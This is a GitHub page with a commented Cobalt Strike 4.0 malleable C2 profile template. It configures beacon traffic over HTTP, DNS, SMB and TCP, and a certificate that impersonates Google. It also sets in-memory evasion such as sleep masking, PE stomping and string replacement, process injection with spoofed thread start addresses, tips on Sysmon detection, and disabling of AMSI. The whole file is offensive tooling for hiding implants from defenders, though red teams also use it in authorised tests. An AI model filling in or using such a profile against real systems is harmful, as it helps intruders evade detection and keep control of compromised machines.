-
Notifications
You must be signed in to change notification settings - Fork 366
/
Copy pathCS4.0_guideline.profile
318 lines (282 loc) · 19.5 KB
/
CS4.0_guideline.profile
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
# CobaltStrike 4.0+ Guideline Profile
#
# Malleable C2 profiles control the beacon traffics and communication indicators as well as in-memory characteristics, beacon process injection
# and influencing post-exploitation jobs, which are the most sexiest features of the CobbaltStrike.
#
# References:
# * https://www.cobaltstrike.com/help-malleable-c2
# * https://www.cobaltstrike.com/help-malleable-postex
#
# Author: @bigb0ss
# Github: https://github.com/bigb0sss
#
# Updates:
# 04/02/2020
# (1) "[]" brackets to contain choice options
# (2) "<>" brackets for user-supplied values. Example values already provided.
# (3) Adding options for all the blocks as many as possible. Add/remove them as your own usage.
### Global Option Block
set sample_name "<bigb0ss>.profile"; # Profile name (used in the Indicators of Compromise report)
set sleeptime "<30000>"; # Sleep time for the beacon callback (in milliseconds)
set jitter "<50>"; # Jitter to set %. In this example, the beacon will callback between 15 and 30 sec jitter
set host_stage "[true|false]"; # Staged payload allow or disallow (Note: Stager payloads are generally easier to get caught, but it's necessary for the space-restricted situations)
set useragent "<Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.177>"; # User-Agent Setup
### DNS Beacon Block
set dns_idel "<8.8.8.8>"; # IP to indicate no tasks available. Avoid using bogon address "0.0.0.0" (This can be picked up as IOC)
set maxdns "[0-255]"; # Maximum length of hostname when uploading data over DNS (0-255)
set dns_sleep "<1000>"; # Force a sleep prior to each individual DNS request. (in milliseconds)
set dns_stager_prepend ""; # Prepend text to payload stage delivered to DNS TXT record stager
set dns_stager_subhost "<.stage.8546.>"; # Subdomain used by DNS TXT record stager
set dns_max_txt "[0-255]"; # Maximum length of DNS TXT responses for tasks
set dns_ttl "<1>"; # TTL for DNS replies
### SMB Beacon Block (P2P)
set pipename "<win_svc+8546>"; # Name of pipe to use for SMB beacon's peer-to-peer communication
set pipename_stager "<win_svc+8546>"; # Name of pipe to use for SMB beacon's named pipe stager
### TCP Beacon Block (P2P)
set tcp_port "<1337>"; # TCP beacon listen port
### Self-Signed Certificate HTTPS Beacon Block (This is useful to replicate existing SSL certificate values)
https-certificate {
set C "<US>"; # Country
set CN "<google.com>"; # Common Name; Whatever.com or your callback domain
set L "<Mountain View>"; # Locality
set O "<Alphabet Inc.>"; # Organization Name
set OU "<Google Certificate>"; # Organizational Unit Name
set ST "<CA>"; # State
set validity "<365>"; # Number of days certificate is valid for
}
### Valid SSL Certificate HTTPS Beacon Block (Specify a Java Keystore file and a password for the keystore)
https-certificate {
set keystore "<domain>.store"; # Private key, root cert, intermediate cert and domain cert - Java Keystore file should be in the same folder with Malleable C2 profile
set password "<mypassword>"; # The password to your Java Keystore
}
### Creating a Valid SSL Certificate
# keytool -genkey -keyalg RSA -keysize 2048 -keystore domain.store
# keytool -certreq -keyalg RSA -file domain.csr -keystore domain.store
# keytool -import -trustcacerts -alias FILE -file FILE.crt -keystore domain.store
# keytool -import -trustcacerts -alias mykey -file domain.crt -keystore domain.store
### Code Signing Certificate Block
code-signer {
set keystore "<keystore>.jks";
set password "<mypassword>";
set alias "<server>";
}
### Creating a Code Signing Certificate
# keytool -genkey -alias server -keyalg RSA -keysize 2048 -keystore keystore.jks
# keytool -certreq -alias server -file csr.csr -keystore keystore.jks
# keytool -import -trustcacerts -alias server -file domain.p7b -keystore keystore.jks
### HTTP/S Global Response Header Block
http-config {
set headers "Server, Content-Type, Cache-Control, Connection, X-Powered-By"; # HTTP header order
header "Server" "Microsoft-IIS/8.5";
header "Content-Type" "text/html;charset=UTF-8";
header "Cache-Control" "max-age=1";
header "Connection" "keep-alive";
header "X-Powered-By" "ASP.NET";
set trust_x_forwarded_for "[true|false]"; # "true" if the team server is behind an HTTP redirector
}
### HTTP-GET Block (Beacon check-in for task queued)
http-get {
set uri "</image/xxxxxx>"; # For multiple URIs = "/image /index /sexy"
set verb "[GET|POST]" # Not really need to config this for http-get, but you can change it to POST if you want
client {
header "Host" "<domain.com>";
header "Accept" "*/*";
header "Accept-Language" "en-US";
header "Connection" "close";
}
metadata {
# Data Transform Language
base64; # Base64 Encode
base64url; # URL-safe Base64 Encode
mask; # XOR mask w/ random key
netbios; # NetBIOS Encode 'a'
netbiosu; # NetBIOS Encode 'A'
prepend "<user=>"; # Prepend "string"
append "<.asp>"; # Append "string"
# Termination Statements
parameter "<key>"; # Store data in a URI parameter
header "<Cookie>"; # Store data in an HTTP header
uri-append; # Append to URI
print; # Send data as transaction body (set "verb" to POST to use "print")
}
server {
# headers will be pulled from the http-config block, or manually add your preferences below:
header "Server" "Apache";
output {
base64; # Base64 Encode
base64url; # URL-safe Base64 Encode
mask; # XOR mask w/ random key
netbios; # NetBIOS Encode 'a'
netbiosu; # NetBIOS Encode 'A'
prepend "<user=>"; # Prepend "string"
append "<.asp>"; # Append "string"
print; # Server block MUST be terminated with "print"
}
}
}
### HTTP-POST Block (Beacon check-in for task output)
http-post {
set uri "</image/xxxxxx>"; # For multiple URIs = "/image /index /sexy"
set verb "[GET|POST]" # Use "GET" for GET Only C2
client {
header "Host" "<domain.com>";
header "Accept" "*/*";
header "Accept-Language" "en-US";
header "Connection" "close";
id {
base64; # Base64 Encode
base64url; # URL-safe Base64 Encode
mask; # XOR mask w/ random key
netbios; # NetBIOS Encode 'a'
netbiosu; # NetBIOS Encode 'A'
prepend "<user=>"; # Prepend "string"
append "<.asp>"; # Append "string"
parameter "<id>"; # Add Beacon ID in parameter
header "<ID-Header>"; # Add Beacon ID in header
}
output {
base64; # Base64 Encode
base64url; # URL-safe Base64 Encode
mask; # XOR mask w/ random key
netbios; # NetBIOS Encode 'a'
netbiosu; # NetBIOS Encode 'A'
prepend "<user=>"; # Prepend "string"
append "<.asp>"; # Append "string"
parameter "<key>"; # Store data in a URI parameter
header "<Cookie>"; # Store data in an HTTP header
uri-append; # Append to URI
}
}
server {
# headers will be pulled from the http-config block, or manually add your preferences below:
header "Server" "Apache";
output {
base64; # Base64 Encode
base64url; # URL-safe Base64 Encode
mask; # XOR mask w/ random key
netbios; # NetBIOS Encode 'a'
netbiosu; # NetBIOS Encode 'A'
prepend "<user=>"; # Prepend "string"
append "<.asp>"; # Append "string"
print; # Server block MUST be terminated with "print"
}
}
}
### HTTP-Stager Block (Options for using a staged payload)
http-stager {
set uri_x86 "</get32.gif>"; # Set to download 32-bit payload stage
set uri_x64 "</get64.gif>"; # Set to download 64-bit payload stage
client { # Clinet = Defining the client side of the HTTP transaction.
header "Host" "<domain.com>";
header "Accept" "*/*";
header "Accept-Language" "en-US";
header "Connection" "close";
header "Cookie" "XXXXXX"
parameter "id" "8645";
}
server {
# headers will be pulled from the http-config block, or manually add your preferences below:
header "Server" "Apache";
output {
base64; # Base64 Encode
base64url; # URL-safe Base64 Encode
mask; # XOR mask w/ random key
netbios; # NetBIOS Encode 'a'
netbiosu; # NetBIOS Encode 'A'
prepend "<user=>"; # Prepend "string"
append "<.asp>"; # Append "string"
print; # Server block MUST be terminated with "print"
}
}
}
### Malleable PE & In-Memory Evasion and Obfuscation Block
stage {
set checksum "<0>"; # The CheckSum value in Beacon's PE header
set cleanup "[true|false]"; # If "true," free memory associated with the Reflective DLL package when it's no longer needed
set compile_time "<02 April 2020 02:35:00>"; # The build time in Beacon's PE header
set entry_point "<92145>"; # The EntryPoint value in Beacon's PE header
set image_size_x86 "<512000>"; # SizeOfImage value in x86 Beacon's PE header ([!] Avoid using image_size_x86 if module_x86 in use)
set image_size_x64 "<512000>"; # SizeOfImage value in x64 Beacon's PE header ([!] Avoid using image_size_x64 if module_x64 in use)
# Module Stomping (By default, Beacon's loader allocates memory with VirtualAlloc. Module stomping is an alternative to this.)
set module_x86 "<legit.dll>"; # Ask the x86 ReflectiveLoader to load the specified library and overwrite its space instead of allocating memory with VirtualAlloc
set module_x64 "<legit.dll>"; # Ask the x64 ReflectiveLoader to load the specified library and overwrite its space instead of allocating memory with VirtualAlloc
set name "<legit.dll>"; # The Exported name of the Beacon DLL
set rich_header "<\x00\x00\x00\x00>"; # Meta-information inserted by the compiler. The Rich header is a PE section that serves as a fingerprint of a Windows’ executable’s build environment
# Example Rich Header of cmd.exe
# \x44\x61\x6E\x53\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x78\x93\x00\x42\x00\x00\x00
# \x73\x62\x03\x01\x03\x00\x00\x00\x73\x62\x04\x01\x15\x00\x00\x00\x00\x00\x01\x00\x25\x01\x00\x00
# \x73\x62\x01\x01\x05\x00\x00\x00\x73\x62\x05\x01\x09\x00\x00\x00\x73\x62\x0E\x01\x28\x00\x00\x00
# \x73\x62\xFF\x00\x01\x00\x00\x00\x73\x62\x02\x01\x01\x00\x00\x00\x52\x69\x63\x68\x98\x79\x8F\x1E
# \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
set sleep_mask "[true|false]"; # Obfuscate Beacon, in-memory, prior to sleeping
set stomppe "[true|false]"; # Ask ReflectiveLoader to stomp MZ, PE, and e_lfanew values after it loads Beacon payload
# stomppe [true] - Lightly obfuscate your Beacon DLL
# stomppe [false] - Allow easy detection
set obfuscate "[true|false]"; # Obfuscate the Reflective DLL's import table (can be IOC), overwrite unused header content, and ask ReflectiveLoader to copy Beacon to new memory without its DLL headers
# "obfuscate" takes many steps to obfuscate your Beacon stage and the final state of the DLL in memory
set userwx "[true|false]"; # Ask ReflectiveLoader to use or avoid RWX permissions for Beacon DLL in memory (can be IOC)
# userwx [true] - Allow RWX permissions (may bring more attention from analysts and security products)
# userwx [false] - Ask Beacon's loader to avoid RWX permissions
# Transform blocks pad and transform Beacon's Reflective DLL stage. (prepend, append, strrep)
# Make sure that prepended data is valid code for the stage's architecture (x86, x64). The c2lint program does not have a check for this.
transform-x86 {
prepend "\x90\x90\x90"; # Inserts a string before Beacon's Reflective DLL --> Defeat analysis on the first few bytes of a memory segment of an injected DLL
append "\x90\x90\x90"; # Adds a string after the Beacon Reflective DLL
strrep "ReflectiveLoader" ""; # Replaces a string within Beacon's Reflective DLL --> Defeat analysis on tool-specific strings
# If "strrep" isn't enough, set "sleep_mask" to true. This directs Beacon to obfuscate itself in-memory before it goes to sleep. After sleeping, Beacon will de-obfuscate itself to request and process tasks. The SMB and TCP Beacons will obfuscate themselves while waiting for a new connection or waiting for data from their parent session.
}
transform-x64 {
prepend "\x90\x90\x90"; # Inserts a string before Beacon's Reflective DLL
append "\x90\x90\x90"; # Adds a string after the Beacon Reflective DLL
strrep "ReflectiveLoader" ""; # Replaces a string within Beacon's Reflective DLL
}
# Stage block allows to add strings to the .rdata section of Beacon DLL
data "<whatever string>"; # Adds a string as-is (ex) "bigb0ss")
string "<whatever string>"; # Adds a null-terminated string (ex) {'b','i','g','b','0','s','s','\0'})
stringw "<whatever string>"; # Adds a wide (UTF-16LE encoded) string (ex) 0062 0069 0067 0062 0030 0073 0073)
}
### Process Injection Block (Controls injected contenet and process injection behaviors)
process-inject {
set allocator "[VirtualAllocEx|NtMapViewOfSection]"; # The preferred method to allocate memory in the remote process.
# allocator [VirtualAllocEx] - For cross-arch memory allocations
# allocator [NtMapViewOfSection] - For same-arch process injection
set min_alloc "<4096>"; # Minimum amount of memory to request for injected content
set startrwx "[true|false]"; # Use RWX as initial permissions for injected content. Alternative is RW.
set userwx "[true|false]"; # Use RWX as final permissions for injected content. Alternative is RX.
# Transform blocks pad and transform Beacon's Reflective DLL stage. (prepend, append)
# Make sure that prepended data is valid code for the stage's architecture (x86, x64). The c2lint program does not have a check for this.
transform-x86 {
prepend "\x90\x90\x90"; # Inserts a string before Beacon's Reflective DLL
append "\x90\x90\x90"; # Adds a string after the Beacon Reflective DLL
}
transform-x64 {
prepend "\x90\x90\x90"; # Inserts a string before Beacon's Reflective DLL
append "\x90\x90\x90"; # Adds a string after the Beacon Reflective DLL
}
# Execute - Determin how to execute the injected code
execute {
# CreateThread & CreateRemoteThread Operations:
# (1) Spawn a suspended thread with the address of another function
# (2) Update the suspended thread to execute the injected code
# (3) Finally, resume that thread
# Use [function] “module!function+0x##” to specify the start address to spoof
CreateThread "ntdll.dll!RtlUserThreadStart+0x1000"; # Current process only ([!] Sysmon EventID 8 - a process creates a thread in another process)
CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000"; # No cross-session ([!] Sysmon EventID 8 - a process creates a thread in another process)
NtQueueApcThread; # Uses RWX shellcode and "CreateThread" start address. Same-arch injection only
NtQueueApcThread-s; # "Early Bird" injection technique. Suspended process only
RtlCreateUserThread; # Risky on XP-era targets. Uses RWX shellcode for x86 -> x64 injection. ([!] Sysmon EventID 8 - a process creates a thread in another process)
SetThreadContext; # Suspended process only
}
}
### Post-Exploitation Block (Controls the post-ex content and behaviors)
# CobaltStrike Post-Ex Operations (ex) screenshot, keylogger, hashdump, etc.):
# (1) Leverage Windows DLLs to execute post-ex features
# (2) To do this, CobaltStrike spawns a temp process --> injects the feature into it
post-ex {
set spawnto_x86 "%windir%\\syswow64\\<mfpmp>.exe"; # Do not specify %windir%\system32 or c:\windows\system32 directly
set spawnto_x64 "%windir%\\sysnative\\<mfpmp>.exe"; # Do not specify %windir%\system32 or c:\windows\system32 directly
set obfuscate "[true|false]"; # Obfuscate the permissions and content of our post-ex DLLs
set smartinject "[true|false]"; # Directs Beacon to embed key function pointers (ex) GetProcAddress, LoadLibrary) into its same-arch post-ex DLLs.
# This allows post-ex DLLs to bootstrap themselves in a new process without shellcode-like behavior that is detected and mitigated by watching memory accesses to the PEB and kernel32.dll.
set amsi_disable "[true|false]"; # Disable AMSI (Antimalware Scan Interface) in powerpick, execute-assembly and psinject before loading .NET or PS code
}